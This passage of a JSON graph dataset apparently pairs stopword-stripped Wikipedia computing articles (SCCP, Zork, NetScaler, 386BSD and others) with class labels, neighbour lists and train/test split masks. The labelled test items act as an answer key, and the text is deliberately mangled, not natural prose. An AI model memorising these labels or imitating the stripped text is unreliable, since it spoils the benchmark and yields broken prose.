    "text": "Skinny_Call_Control_Protocol:skinny call control protocol skinny client control protocol sccp proprietary network terminal control protocol originally developed selsius systems acquired cisco systems 1998 sccp lightweight ip-based protocol session signaling cisco unified communications manager formerly named callmanager examples sccp clients include cisco 7900 series ip phones cisco ip communicator softphone 802.11b wireless wireless ip phone 7920 along cisco unity voicemail server callmanager acts signaling proxy call events initiated common protocols h.323 session initiation protocol sip isdn and/or mgcp sccp client uses tcp/ip communicate one call manager applications cluster uses real-time transport protocol rtp udp-transport bearer traffic real-time audio stream skinny clients h.323 terminal sccp stimulus-based protocol designed communications protocol hardware endpoints embedded systems significant cpu memory constraints cisco analog media gateways vg248 gateway register communicate cisco unified communications manager using sccp cisco acquired sccp technology acquired selsius corporation 1998 reason protocol also referred cisco documentation selsius skinny station protocol another remnant origin cisco ip phones default device name format registered cisco phones callmanager sep selsius ethernet phone followed mac address cisco also marketed skinny-based softphone called cisco ip communicator companies symbol technologies socketip digium implemented protocol voip terminals ip phones media gateway controllers softswitches open source implementation available asterisk freeswitch systems ipblue provides soft phone emulates cisco 7960 telephone twinlights software distributes soft phone implementation android-based devices cisco unified application environment product acquired cisco purchased metreos supports using sccp emulate cisco 7960 phones allowing applications access cisco line-side features",
    "neighbors": [
      6177,
      7681,
      9381,
      7407,
      10864,
      6993,
      6834,
      5843,
      7411,
      11413,
      10271
    ],
    "mask": "Test"
  },
  {
    "node_id": 615,
    "label": 4,
    "text": "Global_Internet_Freedom_Consortium:global internet freedom consortium global internet freedom consortium consortium organizations develop deploy anti-censorship technologies use internet users countries whose governments restrict web-based information access organization reportedly begun 2001 chinese-born scientists living united states reacting chinese government oppression falun gong main products freegate ultrasurf organization states majority funding comes members may 2010 group offered 1.5 million usd grant united states department state move received criticism representatives chinese government",
    "neighbors": [
      1317,
      1070,
      11695,
      6000,
      1169,
      9233,
      1692,
      5887
    ],
    "mask": "Train"
  },
  {
    "node_id": 616,
    "label": 3,
    "text": "Ninja-Kid:ninja-kid ninja-kun demon castle adventure features three upward scrolling levels repeat become difficult objective defeat enemies screen advance next screen player attack shurikens jump enemies heads stun occasionally orb appear player collects three bonus level unlocked ninja-kid ii known japan known north america rad action jt-104 platform action video game first developed published 1987 upl japan direct sequel ninja-kid jaleco ported game sequel famicom msx japan company created ninja-kun younger brother ninja jajamaru-kun created series titled ninja jajamaru-kun ninja jajamaru-kun series would feature several games released various consoles handhelds many games different genres like role-playing video game gameplay",
    "neighbors": [
      10064,
      10931
    ],
    "mask": "None"
  },
  {
    "node_id": 617,
    "label": 2,
    "text": "Mojave_Experiment:mojave experiment mojave experiment failed advertising campaign microsoft windows vista campaign unsuccessful part microsoft efforts change felt unfair negative consumer perception operating system mojave spanned series advertisements consisted individuals shown demonstration windows vista microsoft however operating system rebranded disguise new version windows codenamed mojave revealed demonstration prior demonstration participants generally gave negative assessment windows vista afterwards participants pressured delivering reviews mojave positive participants stating intended use purchase operating system participants asked act astonished told mojave windows vista campaign implied negative consumer perception largely result preconceived notions operating system resulting continuous negative portrayals media mojave experiment public case study designed microsoft determine computer users thoughts windows vista absence prior experience study begins asking participant thoughts windows vista answers based solely knowledge word mouth asked rate windows vista 0 10 next participants introduced windows mojave windows vista rebranded prevent preconceived bias users guided microsoft assistant test mojave test participants asked rate mojave 0 10 revealed participants mojave simply windows vista rebranded mohab gabal criticized experiment hardware software already set users install applications device drivers typical source compatibility issues",
    "neighbors": [
      259,
      4356,
      11524,
      6150,
      5004,
      6797,
      782,
      1935,
      10900,
      3605,
      11030,
      3224,
      11549,
      7838,
      7456,
      929,
      5666,
      3875,
      7970,
      9505,
      11559,
      1832,
      1577,
      6441,
      1581,
      2221,
      7215,
      7983,
      3890,
      11060,
      1077,
      8757,
      6462,
      7359,
      4289,
      194,
      3527,
      8391,
      1098,
      6476,
      10957,
      4816,
      3283,
      8659,
      9812,
      11221,
      4439,
      11605,
      11103,
      4704,
      10338,
      740,
      2919,
      9448,
      5225,
      8681,
      2027,
      9585,
      7796,
      6265,
      1916
    ],
    "mask": "Test"
  },
  {
    "node_id": 618,
    "label": 4,
    "text": "Integral_cryptanalysis:integral cryptanalysis cryptography integral cryptanalysis cryptanalytic attack particularly applicable block ciphers based substitution-permutation networks originally designed lars knudsen dedicated attack square commonly known square attack also extended ciphers related square crypton rijndael shark stefan lucks generalized attack called saturation attack used attack twofish similar square radically different feistel network structure forms integral cryptanalysis since applied variety ciphers including hierocrypt idea camellia skipjack misty1 misty2 safer++ khazad fox called idea nxt unlike differential cryptanalysis uses pairs chosen plaintexts fixed xor difference integral cryptanalysis uses sets even multisets chosen plaintexts part held constant another part varies possibilities example attack might use 256 chosen plaintexts 8 bits differ 8 bits set necessarily xor sum 0 xor sums corresponding sets ciphertexts provide information cipher operation contrast differences pairs texts sums larger sets texts inspired name integral cryptanalysis borrowing terminology calculus",
    "neighbors": [
      7556,
      2567,
      3084,
      2957,
      7056,
      658,
      660,
      1173,
      1941,
      4128,
      1315,
      4389,
      10662,
      169,
      11185,
      8627,
      8628,
      2357,
      10806,
      1847,
      9528,
      2110,
      9541,
      10315,
      6863,
      8273,
      7635,
      212,
      9556,
      10963,
      11349,
      2265,
      1114,
      7643,
      9697,
      8674,
      229,
      1898,
      11119,
      881,
      1654,
      7161,
      7034,
      892
    ],
    "mask": "Test"
  },
  {
    "node_id": 619,
    "label": 7,
    "text": "Distributed_design_patterns:distributed design patterns software engineering distributed design pattern design pattern focused distributed computing problems distributed design patterns divided several groups",
    "neighbors": [
      11343
    ],
    "mask": "Test"
  },
  {
    "node_id": 620,
    "label": 7,
    "text": "InstantTV:instanttv instanttv cloud software digital video recorder dvr operated singapore based recordtv pte ltd company founded carlos nicholas fernandes 2007 previously offered services recordtv.com recordtv.com originally us-based company provided cloud-based recording cable tv channels founder david simon subscribed user internet mpaa sued simon copyright infringement simon initially hired ira rothken defend litigation eventually gave settled decided sell assets fernandes purchased assets recordtv.com simon invented patented system method recording television and/or radio programmes via internet among things recordtv.com service restricted singapore users alone users able record singapore free-to-air content broadcast singapore state-owned broadcaster mediacorp shortly thereafter 24 july 2017 27 september 2017 recordtv.com received two cease desist letters alleging infringement mediacorp recordtv pte ltd refused comply demand shut website first cease desist letter mediacorp recordtv lawyers wrote back alleging mediacorp move calculated stifle innovation growth new industry according article singapore press holdings republished second september cease desist letter received recordtv preemptively sued mediacorp groundless threats copyright infringement proceedings claimed 30.5 million damages continued operate website one core legal issues arose whether recordtv.com recording content behalf users whether users using recordtv.com record tv shows would otherwise entitled see significant case would turn identity party making copy – consumer could considered time-shifting domestic use therefore legal company company recording commercial use therefore illegal thus case would turn based identity party making copy mediacorp represented drew napier ceo senior counsel davinder singh cross-examined recordtv ceo fernandes 3.5 days trial recordtv lost lawsuit high court singapore initial adverse judgment recordtv justice ang high court cited copyright law specialist william patry following judgment patry stated view justice ang erred blog post called singaporean cablevision case asserted court misread cablevision ruling found favour recordtv david post legal scholar co-author amicus curiae brief support cablevision also indicated writings court found favour recordtv recordtv chose appeal ruling ruling onset court appeals set importance case society court appeals ruled favour recordtv awarded costs damages issued injunction mediacorp issuing threats recordtv reversing ruling lower court court appeals summarised conclusion following victory zdnet quoted fernandes saying litigation described david vs. goliath battle came familiar conclusion front page business times newspaper fernandes subsequently named young global leader world economic forum result initial adverse ruling high court recordtv shut website following reversal court appeals recordtv relaunched website october 2014 recordtv launched app called instanttv targeted global market including free channels thailand japan indonesia united states united kingdom markets facility record play singapore channels persisted although continued geographically restricted singapore ip addresses instanttv app android play store went 10,000 installs 4 november 2014 100,000 installs 1000 increase 3 august 2015 7 months",
    "neighbors": [],
    "mask": "None"
  },
  {
    "node_id": 621,
    "label": 2,
    "text": "4OS2:4os2 4os2 os/2 analogue 4nt 4dos jp software inc. jp software discontinued 4os2 tcmdos2 tcmd16 making version 3.0 2.0 2.0 final version code 4os2 released maintained first scitech netlabs early versions 4os2 run windows nt os/2 emulation particular running lead jp software port 4os2 microsoft windows 4nt example still os/2 cmd.exe commands like extproc rexx support earlier versions commands like dpath libpath setting variables manner path early 4os2 packages came 16- 32-bit versions former run os/2 1.x including windows nt os/2 eventually 16-bit support dropped jp software final releases products download page 4os2 v4.0 different programmers took maintaining release since merged 4os2 found recent life netlabs",
    "neighbors": [
      2786,
      2181,
      4870,
      7847,
      6921,
      6797,
      7983,
      3856,
      8976,
      10387,
      10068,
      8729,
      7325
    ],
    "mask": "None"
  },
  {
    "node_id": 622,
    "label": 2,
    "text": "Protected_Media_Path:protected media path protected media path set technologies creating protected environment first included microsoft windows vista operating system used enforce digital rights management drm protections content subsets protected video path pvp protected user mode audio puma application uses protected media path windows uses media foundation protected environment drm content played contains media components play drm content application needs provide remote control play rewind pause rather handle unprotected content data protected environment also provides necessary support microsoft-approved signed third-party software modules added provides wall outside copying within walls content processed without making content available unapproved software order prevent users copying drm content windows vista provides process isolation continually monitors kernel-mode software loaded unverified component detected vista stop playing drm content rather risk content copied protected environment implemented completely software software-based attacks patching windows kernel possible restrictions concern various outputs pc drm content digital outputs digital visual interface dvi high definition multimedia interface hdmi high-bandwidth digital content protection hdcp enabled prevent someone recording digital stream even analog tv-style outputs typically require restrictions provided mechanisms macrovision cgms-a restrictions apply drm-restricted content hd dvd blu-ray encrypted aacs also apply windows xp using supported playback applications users standard unprotected content restrictions output types s/pdif sony/philips digital interchange format typically ’ suitable drm scheme available need turned reliably content specifies vista control pc video outputs provided pvp-opm essentially next generation certified output protection protocol copp introduced windows xp however rather software application programming interface pvp-opm operates windows media components protected environment additionally pvp-uab protected video path user-accessible bus used encrypt video audio data passes pci-express bus prevent intercepted copied way graphics card complementary pvp output protection management january 2007 developer alex ionescu announced found method allows end users bypass vista protected media path would allow digital content played equipment implement drm restriction measures like rescaling video resolutions disabling analog audio outputs however release source code fear microsoft lawsuit regarding possible violation dmca 6 march 2007 microsoft responded internal testing described method would work addition common criticisms digital rights management schemes speculation scheme motivated fact would affect official free/open source graphics driver support manufacturers scheme relies internals graphics cards tell whether hardware trustworthy permitted play copy-protected content could subverted attacker knows certain details hardware operation could disclosed hardware documentation open source device drivers however affect platform independency scheme provided charge microsoft frequently accused adding protected media path feature vista block customers copying rightfully owned media content practice believed protected fair use provisions copyright act feature widely quoted example microsoft uncompromising adherence drm accusations never gained much traction largely vista treats non-drm media exactly previous versions windows following vista release change availability free/open source drivers graphics hardware manufacturers",
    "neighbors": [
      11270,
      5643,
      4624,
      537,
      540,
      3102,
      9762,
      8227,
      8740,
      1577,
      10281,
      3629,
      2101,
      10812,
      3648,
      10310,
      1098,
      7754,
      10828,
      4173,
      4174,
      9808,
      4178,
      10839,
      603,
      9819,
      3170,
      9839,
      4210,
      7796,
      1656,
      6265,
      7290,
      4731,
      10879,
      8841,
      651,
      6797,
      2193,
      9874,
      10900,
      4248,
      7838,
      9377,
      3235,
      4771,
      6820,
      1703,
      2221,
      5300,
      7351,
      10428,
      2749,
      2244,
      8391,
      200,
      9420,
      2782,
      9442,
      4836,
      4326,
      2279,
      1770,
      3308,
      10993,
      3834,
      1791,
      8959,
      11519,
      6927,
      3856,
      3351,
      8473,
      8985,
      11546,
      8988,
      5413,
      5928,
      3881,
      10024,
      10026,
      10029,
      7983,
      1844,
      9525,
      11572,
      10039,
      6972,
      3394,
      3922,
      11605,
      4439,
      5465,
      2402,
      2919,
      4458,
      6506,
      9066,
      9593,
      2943,
      1418,
      5003,
      5004,
      8080,
      11677,
      929,
      11683,
      430,
      6062,
      10673,
      9655,
      6584,
      1978,
      960,
      8132,
      6088,
      969,
      3535,
      8659,
      1498,
      5594,
      478,
      6114,
      6115,
      2027,
      6637,
      9709,
      6641,
      3573
    ],
    "mask": "Validation"
  },
  {
    "node_id": 623,
    "label": 9,
    "text": "S_(programming_language):programming language statistical programming language developed primarily john chambers earlier versions rick becker allan wilks bell laboratories aim language expressed john chambers turn ideas software quickly faithfully modern implementation r part gnu free software project s-plus commercial product formerly sold tibco software one several statistical computing languages designed bell laboratories first took form 1975–1976 time much statistical computing done directly calling fortran subroutines however designed offer alternate interactive approach early design decisions hold even today include interactive graphics devices printers character terminals time providing easily accessible documentation functions first working version built 1976 operated gcos operating system time unnamed suggestions included interactive scs iscs statistical computing system statistical analysis system already taken see sas system name used single quotation marks 1979 chosen common letter used statistical computing consistent programming languages designed institution time namely c programming language unix/32v ported new 32-bit dec vax computing unix platform became feasible s. late 1979 ported gcos unix would become new primary platform 1980 first version distributed outside bell laboratories 1981 source versions made available 1984 two books published research team bell laboratories interactive environment data analysis graphics 1984 brown book extending system also 1984 source code became licensed software sales education commercial purposes 1988 many changes made syntax language new language 1988 blue book published introduce new features transition macros functions functions passed functions codice_1 many changes language extend concept objects make syntax consistent strict however many users found transition new difficult since macros needed rewritten many changes took hold use x11 postscript graphics devices rewriting many internal functions fortran c use double precision arithmetic new language similar used modern versions s-plus r. 1991 statistical models 1991 white book published introduced use formula-notation use '~ operator data frame objects modifications use object methods classes latest version standard s4 released 1998 provides advanced object-oriented features s4 classes differ markedly s3 classes",
    "neighbors": [
      9345,
      10510,
      6160,
      11153,
      5395,
      5917,
      7326,
      8628,
      8262,
      5833,
      207,
      11219,
      11604,
      2519,
      2652,
      10083,
      4069,
      11625,
      2035,
      5492,
      3960,
      2556,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 624,
    "label": 7,
    "text": "NetScaler:netscaler netscaler line networking products owned citrix systems products consist netscaler adc application delivery controller adc netscaler appfirewall application firewall netscaler unified gateway netscaler management analytics system netscaler sd-wan provides software-defined wide-area networking management netscaler initially developed 1997 michel k susai acquired citrix 2005 citrix consolidated networking products netscaler brand 2016 netscaler line products part citrix systems networking business includes netscaler adcs netscaler unified gateway netscaler appfirewall netscaler sd-wan netscaler management analytics system products work conjunction citrix offerings including xen line products netscaler integrated openstack part citrix systems sponsorship openstack foundation netscaler adc citrix systems core networking product application delivery controller adc tool improves delivery speed quality applications end user product aimed business customers performs tasks traffic optimization l4-l7 load balancing web app acceleration maintaining data security netscaler adc monitors server health allocates network application traffic additional servers efficient use resources also performs several kinds caching compression made server proxy process ssl requests offers vpn micro-app vpn operations also includes netscaler application firewall ssl encryption capabilities netscaler adc manage traffic ddos attacks making sure traffic gets critical applications additionally netscaler logs network activity feed citrix cloud-based analytics service used analyze identify security risks four versions netscaler adc netscaler mpx hardware-based appliance use data centers netscaler sdx hardware-based appliance intended service providers provides virtualization delivering multitenancy virtual cloud-based data centers netscaler vpx software-based application implemented virtual machine intended small business use netscaler cpx netscaler adc packaged container designed cloud microservices applications addition netscaler line products include netscaler sd-wan formerly cloudbridge sd-wan provides software-defined wide-area networking branch networking netscaler unified gateway offers secure remote access virtual desktops variety applications single point entry single sign-on sso netscaler management analytics system platform designed organization automation policy management across devices applications tool intended professionals manage various netscaler products single dashboard platform also provides real-time analytics entrepreneur michel k. susai founded netscaler 1997 san jose california created netscaler solution reducing infrastructure growth internet late 1990s company repositioned netscaler security optimization tool 2001 2005 netscaler estimated 75 percent internet users used systems clients including google amazon citrix acquired netscaler 2005 approximately 300 million cash stock citrix released netscaler mpx faster power efficient netscaler adc model 2008 introduced vpx edition following year 2011 citrix launched netscaler sdx 2016 citrix transitioned delivery products netscaler brand citrix cloudbridge sd-wan became netscaler sd-wan company also introduced “ netscaler management analytics system ” console users manage netscaler products including adcs sd-wan containerized version netscaler called netscaler cpx citrix released free developer version netscaler cpx called netscaler cpx express august 2016. annual net revenue sales netscaler products services reviewing netscaler adc 2007 infoworld gave score 8.6 10 reviewer noted easy set administer provided performance improvements load balancing web application speed however variable results features tcp session buffering tcp session consolidation would depend factors well infoworld said netscaler best suited organizations making corporate applications available web internal external customers large heavily trafficked web sites costly available solutions small three-node web farm lightly loaded gcn wrote 2011 netscaler much load balancer ’ really all-in-one web application delivery system site gave netscaler a+ rating features b- ease use a+ performance c value article noted difficult learn expensive",
    "neighbors": [
      4194,
      2339,
      2118,
      3880,
      4725,
      5749,
      5371
    ],
    "mask": "Validation"
  },
  {
    "node_id": 625,
    "label": 3,
    "text": "Zork_II:zork ii zork ii wizard frobozz interactive fiction video game published infocom 1981 written marc blank dave lebling bruce daniels tim anderson second game popular zork trilogy released wide range computer systems begins zork left leads zork iii infocom second game player begins barrow zork armed trusty brass lantern elvish sword great antiquity objective game initially clear wizard frobozz soon introduced wizard respected enchanter powers began fade exiled lord dimwit flathead bordering senility wizard still force reckoned player goal wizard realm avoid capricious tricks learn control magic like predecessor zork ii essentially treasure hunt unlike previous game ten treasures tied together crude plot finding treasures end game treasures needed finish game instead adventurer must figure way use treasures order reach game finale zork ii 50 ways die game contains difficult bank zork vault puzzle player must walk appear solid walls puzzle player controls destination depending direction entered room game also includes oddly-angled room puzzle relied upon player familiar baseball infocom apologized american-centric puzzle official hints game player gets stranded volcano ledge e.g. forgetting tie balloon hook time volcano gnome appears similarly player gets trapped bank another gnome appears adventurer puts non-valuable items box gnome tosses disappear adventurer n't give gnome something valuable leave player stranded adventurer presents lit brick bomb suitably amusing response made followed also abandonment zork ii sold 173,204 copies 1986 softline praised game well-balanced mix humor wit wry puns magazine warned difficulty concluded zork ii recommended novice master adventurer wants feeling satisfaction upon completion well-thought-out imaginative adventure pc magazine stated zork ii appeal universal game challenge interesting difficult frustrating enjoyable plenty time game endlessly amusing addison-wesley book atari software 1984 gave game overall a+ rating stating outstanding command flexibility wry humor word recognition zork astronaut mark watney discovers copy zork ii fellow astronaut beth johanssen computer martian film",
    "neighbors": [
      577,
      7116,
      9006,
      1265,
      11666,
      3443,
      627,
      10931,
      4409
    ],
    "mask": "None"
  },
  {
    "node_id": 626,
    "label": 1,
    "text": "The_Health_Improvement_Network:health improvement network health improvement network thin large database anonymised electronic medical records collected primary care clinics throughout uk thin database owned managed health improvement network ltd collaboration practice systems ltd health improvement network ltd practice systems ltd subsidiary companies cegedim sa thin database similar structure content clinical practice research datalink cprd previously known gprd managed united kingdom medicines healthcare products regulatory agency mhra 1994 2002 epic uk not-for-profit company held non-exclusive licence use gprd research benefitting public health expiry licence thin developed epic alternative gprd substantial number primary care practitioners contribute data resources 2005 epic acquired cegedim global technology services company specialising healthcare field thin data made available permissive terms similar resources cprd allow for-profit use private companies access subject ethical approval independent scientific review committee data collection commenced january 2003 using information extracted vision widely used general practice management software package developed practice systems ltd company also owned cegedim sa database regularly updated currently contains data 10 million individuals living united kingdom clinical data thin catalogued using read codes comprehensive searchable classification scheme medical conditions symptoms important background information system complemented set additional health data ahd codes provide standardised system recording wide variety clinical measurements drug codes identify prescribed medications since 2004 uk quality outcomes framework performance-related pay scheme primary care practitioners effectively mandated use computer systems vision maintain patient medical records imposed standardised recording methods wide range important medical conditions addition practitioners contributing data thin receive training ensure consistent recording important clinical outcomes indicators including thin important resource fields epidemiology drug safety health outcomes research providing inexpensive means study causes disease effectiveness interventions large representative population",
    "neighbors": [
      3589,
      2901
    ],
    "mask": "Validation"
  },
  {
    "node_id": 627,
    "label": 3,
    "text": "Zork_III:zork iii zork iii dungeon master interactive fiction video game written marc blank dave lebling bruce daniels tim anderson published infocom 1982 infocom fourth game third game zork trilogy released amstrad cpc apple ii atari 8-bit family commodore 64 cp/m ibm pc self-booting disk msx trs-80 later macintosh atari st amiga player begins bottom endless stair zork ii zork iii less straightforward treasure hunt previous installments instead player—in role adventurer played zork zork ii —must demonstrate worthiness assume role dungeon master player must get past guardians zork complete garb dungeon master endure final test player must wearing amulet found bottom lake cloak hood received player chooses look hood vanquished opponent land shadow rather deal final blow staff received man cliff helping retrieve chest valuables attacking man way trying take valuables inevitably breaks staff strange key found key room player uses grue repellent zork ii get past dark places royal ring retrieved royal museum using gold machine travel back year 776 gue black book found royal puzzle unlike zork zork ii time-sensitive event earthquake randomly triggered 130 turns gameplay player must retrieve key earthquake aqueduct broken leaving escape route key room ca n't complete royal puzzle retrieve ring earthquake unopenable great door breaks also unlike previous two zork games lantern little relevance needed walk dark areas junction creepy crawl foggy room beginning game often done completing land shadow cliff flathead ocean—saying hello sailor viking yields invisibility vial—tasks another light source torch scenic vista used retrieve repellent zork ii deposit damp passage via teleportation table provide light source return journey retrieving key player items must give waybread elderly man engravings room reveals dungeon master fed find doorway leading final hallway elvish sword great antiquity used block beam beam room next adventurer must get guardians zork either accomplished using complicated mirror box simply drinking invisibility potion vial flathead ocean player knocks dungeon master door open player fully equipped see tells adventurer obey commands follow help solve final puzzle corridors lead parapet overlooks fiery cells reading book reveals map dungeon treasury zork 8 cells one bronze door leads treasury zork eight positions dial parapet correspond 8 cells adventurer must use trial error point summon cell bronze door dungeon master return original position replacing cell key unlock door revealing treasury zork contains wealth great underground empire well controlling share frobozzco international victorious discovery dungeon master appears transforms player duplicate signifying player succession position steve meretzky said 1984 worst bug ever got zork iii sword last puzzle makes game unwinnable call things like 'fatal errors caught one relatively early said zork iii 30 ways die compared games series scoring system unusual measures player potential simply reflection number treasures found points awarded taking creative steps toward solving problems rather actually solving e.g jumping lake earns adventurer point successfully taking amulet bottom lake system makes possible player 7 points without close finishing game game contains payoff hello sailor joke introduced zork saying hello sailor effect rest game saying hello sailor elicits response nothing happens anymore everywhere else saying hello sailor induces response nothing happens zork iii sold 129,232 copies 1986 creative computing reviewer wrote opinion zork iii best series addison-wesley book atari software 1984 gave game overall a+ rating calling perhaps entertaining three unexpected novel twist ending book concluded zork iii represents highwater mark subtlety logic four star must k-power rated zork iii 8 10 calling intelligent text game microcomputer 've ever seen gold machine known temporizer used travel time zork iii according strategy guide 1996 game zork nemesis caused using machine name shortened form golmac name one spells sorcerer",
    "neighbors": [
      577,
      7116,
      9006,
      1265,
      625,
      10931,
      11666,
      4409
    ],
    "mask": "Test"
  },
  {
    "node_id": 628,
    "label": 9,
    "text": "FuseDocs_(programming):fusedocs programming fusedocs program definition language created hal helms late 1990s original form fusedocs used proprietary vocabulary define responsibilities properties i/o code module coldfusion programming language second form 2.0 fusedocs uses xml vocabulary essence fusedocs forms sort work order telling programmer everything needed write module nothing fusebox architect responsible creating fusedocs application dtd fusedocs available fusebox.org although fusedocs named creation within fusebox community also used developers employ fusebox application framework",
    "neighbors": [
      5048,
      4529,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 629,
    "label": 3,
    "text": "Power_Drift:power drift objective finish race third place better order advance next stage players option continuing finish race fourth place lower game however player score increase upon continuing game tracks roller coaster feel lots steep climbs falls well ability fall higher levels add feeling sit-down cabinet built atop raised hydraulic platform machine would tilt shake quite violently circuit labeled e certain theme example circuit cities circuit b deserts circuit c beaches etc series five tracks also four laps course course springfield ovalshape foofy hilltop snowhill drive octopus oval curry de parl course b swingshot city phantom riverbend octangular ovalshape charlotte beach highland spheres course c bum beach jason bendyline nighthawk city zanussi island wasteman freefall course mexico colours oxygen desert jamie road monaco da farce blow hairpin course e aisthorpe springrose valley patterson nightcity lydia rightaway bungalow ridgeway karen longway two extra stages courses c e resemble jet fighter burner ii courses b resemble superbike super hang-on course game theme song follows power drift later ported amstrad cpc commodore 64 msx amiga atari st ms-dos zx spectrum activision 1989 spectrum version knocked long-standing robocop top sales charts pc engine version developed copya systems published exclusively japan asmik ace entertainment april 13 1990 sega later ported sega saturn part sega ages series compilations february 26 1998 yu suzuki game works vol 1 dreamcast december 1 2001 due weaker hardware every port except saturn dreamcast ones lacks tilting action seen original arcade version 32x port development sega never released unknown reasons likewise dempa also working sega cd conversion reached store shelves well players place first five tracks indicated five gold trophies number wins display behind course letter extra stage unlocked assigned car vehicle sega games courses c e allow players race f-14 tomcat fighter jet burner series extra stage courses b option race motorcycle hang-on series players also press start button race see rear view oddly enough billboards game contain ad well-known coca-cola soft drink defunct real-life chicago radio station wlak 94 sign showing popeye holding mug full beer text next reads seafood beer real estate sign saying sold name australian real estate company max christmas los angeles furniture store victory furniture using entity current real-life fonts signage might in-joke amongst designers might inspired seeing western advertisements magazines travels like",
    "neighbors": [
      4043,
      4716,
      8300,
      9006,
      9166,
      5011,
      3348,
      11452
    ],
    "mask": "Train"
  },
  {
    "node_id": 630,
    "label": 3,
    "text": "Comparison_of_CPU_microarchitectures:comparison cpu microarchitectures following comparison cpu microarchitectures",
    "neighbors": [
      7170,
      7173,
      6151,
      9739,
      1548,
      2066,
      7699,
      5655,
      1563,
      10779,
      10781,
      6181,
      8231,
      2094,
      3630,
      6705,
      7218,
      4664,
      2623,
      2113,
      7234,
      7745,
      4172,
      2638,
      9302,
      3175,
      6252,
      8815,
      5235,
      4217,
      6268,
      3197,
      638,
      8322,
      644,
      4743,
      10375,
      1677,
      7313,
      659,
      8851,
      7833,
      2719,
      6815,
      5793,
      6818,
      8863,
      6821,
      6311,
      2731,
      7852,
      9391,
      2224,
      5297,
      2226,
      7858,
      9911,
      8890,
      1725,
      2237,
      4286,
      6339,
      9932,
      5329,
      725,
      10966,
      731,
      2269,
      11487,
      7911,
      10985,
      9964,
      5358,
      1776,
      2805,
      3317,
      249,
      3323,
      8450,
      1798,
      3846,
      1801,
      6926,
      6415,
      1298,
      11539,
      3352,
      1818,
      7963,
      2339,
      6950,
      3886,
      10543,
      10548,
      309,
      8501,
      11062,
      5948,
      9020,
      8514,
      4423,
      1872,
      7505,
      8530,
      9044,
      344,
      1376,
      10603,
      4465,
      10612,
      11636,
      1399,
      7033,
      1402,
      3457,
      9090,
      9095,
      398,
      3470,
      5518,
      5523,
      407,
      409,
      10658,
      9126,
      10669,
      1967,
      2480,
      9137,
      10675,
      1461,
      1463,
      4030,
      1983,
      453,
      466,
      2516,
      2517,
      3540,
      473,
      4569,
      1499,
      7134,
      5090,
      995,
      7653,
      1000,
      7657,
      1005,
      10734,
      6639,
      499,
      4596,
      3575,
      10746,
      508,
      3071
    ],
    "mask": "Test"
  },
  {
    "node_id": 631,
    "label": 3,
    "text": "Sun_Blade_(workstation):sun blade workstation sun blade series computer workstation line based ultrasparc microprocessor family developed sold sun microsystems 2000 2006 range replaced earlier sun ultra workstation series sun blade 1000 introduced october 2000 first system use fireplane interconnect single dual processors i/o subsystem months ahead use new sun fire server product line 1500/2500 series came two variants earlier red series later silver series silver series enhanced versions red series faster cpu key differentiator sun blade series supplanted sun java workstation line 2004 product line name reference blade server systems term yet common use 2000 2006 sun introduce unrelated sun blade blade server product line",
    "neighbors": [
      3328,
      9731,
      1801,
      4235,
      1809,
      2710,
      1316,
      10789,
      1707,
      3247,
      6322,
      7104,
      9665,
      6338,
      10436,
      1480,
      2895,
      597,
      10200,
      4960,
      9955,
      11363,
      11626,
      7148,
      7022,
      8179,
      11636,
      9333,
      1399,
      9343
    ],
    "mask": "None"
  },
  {
    "node_id": 632,
    "label": 1,
    "text": ".NET_Persistence_API:.net persistence api .net persistence api also referred npa persistence object-relational mapping orm specification .net framework npa based java persistence api jpa standard persistence api java world npa follows jpa providing complete persistence api rich set orm features main purposes .net persistence api npa main features npa include npa persistence specification use npa implementation specification required persistence orm vendors provide implementations npa first implementation npa nhibernate released december 2011",
    "neighbors": [
      2631,
      3821,
      5677,
      2063,
      3573,
      9467,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 633,
    "label": 2,
    "text": "386BSD:386bsd 386bsd also known jolix discontinued unix-like operating system based berkeley software distribution bsd released 1992 ran pc-compatible computer systems based 32-bit intel 80386 microprocessor 386bsd innovations included role-based security ring buffers self-ordered configuration modular kernel design 386bsd written mainly berkeley alumni lynne jolitz william jolitz william jolitz considerable experience prior bsd releases university california berkeley 2.8 2.9bsd contributed code developed symmetric computer systems 1980s berkeley work porting 4.3bsd-reno later 4.3bsd net/2 intel 80386 done university california william jolitz berkeley 4.3bsd net/2 incomplete non-operational release portions withheld university california encumbered i.e subject unix source code license 386bsd releases made public beginning 1992 based portions 4.3bsd net/2 release coupled additional code see missing pieces ii dr. dobb journal may–june 1992 written william lynne jolitz make complete operational release port began 1989 first incomplete traces port found 4.3bsd net/2 1991 port made possible keith bostic partly influenced richard stallman started remove proprietary bsd 1988 port first released march 1992 version 0.0 much usable version july 14 1992 version 0.1 porting process code extensively documented 18-part series written lynne jolitz william jolitz dr. dobb journal beginning january 1991 release 386bsd 0.1 group users began collecting bug fixes enhancements releasing unofficial patchkit due differences opinion jolitzes patchkit maintainers future direction release schedule 386bsd maintainers patchkit founded freebsd project 1993 continue work around time netbsd project founded different group 386bsd users aim unifying 386bsd strands bsd development one multi-platform system projects continue day due lawsuit usl v. regents university california potentially so-called encumbered source agreed distributed within berkeley software distribution net/2 university california subsequent release 1993 4.4bsd-lite made university correct issue however 386bsd dr. dobb journal william jolitz lynne jolitz never parties subsequent lawsuits settlements arising dispute university california continued publish work 386bsd code base lawsuits without limitation never legal filings claims university usl responsible parties respect 386bsd finally code developed 386bsd done william jolitz lynne jolitz issue lawsuits late 1994 finished version 386bsd release 1.0 distributed dr. dobb journal cdrom due immense size 600 mb release 386bsd reference cd-rom best-selling cdrom three years 1994–1997 386bsd release 1.0 contained completely new kernel design implementation began process incorporate recommendations made earlier berkeley designers never attempted bsd august 5 2016 update pushed 386bsd github developer ben jolitz named version 2.0 release 2.0 built upon modular framework create self-healing components however almost documentation remains version 1.0 change log available 386bsd often confused bsd/386 different project developed bsdi berkeley spinout starting 1991 bsd/386 used 386bsd code contributed university california 4.3bsd net/2 although jolitz worked briefly uunet later spun bsdi 1991 work diverged contributed university california appear 386bsd instead william jolitz gave regular code updates donn seeley bsdi packaging testing returned materials william jolitz left company following fundamental disagreements company direction goals rights respect 386bsd jolix held exclusively william jolitz lynne jolitz 386bsd public releases ended 1997 since code available many 386bsd-derived operating systems today along several derivatives thereof apple darwin openbsd portions 386bsd may found open systems opensolaris 1/91 ddj designing software specification",
    "neighbors": [
      2560,
      7682,
      10761,
      2061,
      9743,
      6675,
      8725,
      1561,
      3618,
      1080,
      7224,
      9784,
      3651,
      7748,
      2120,
      6218,
      8266,
      2132,
      9306,
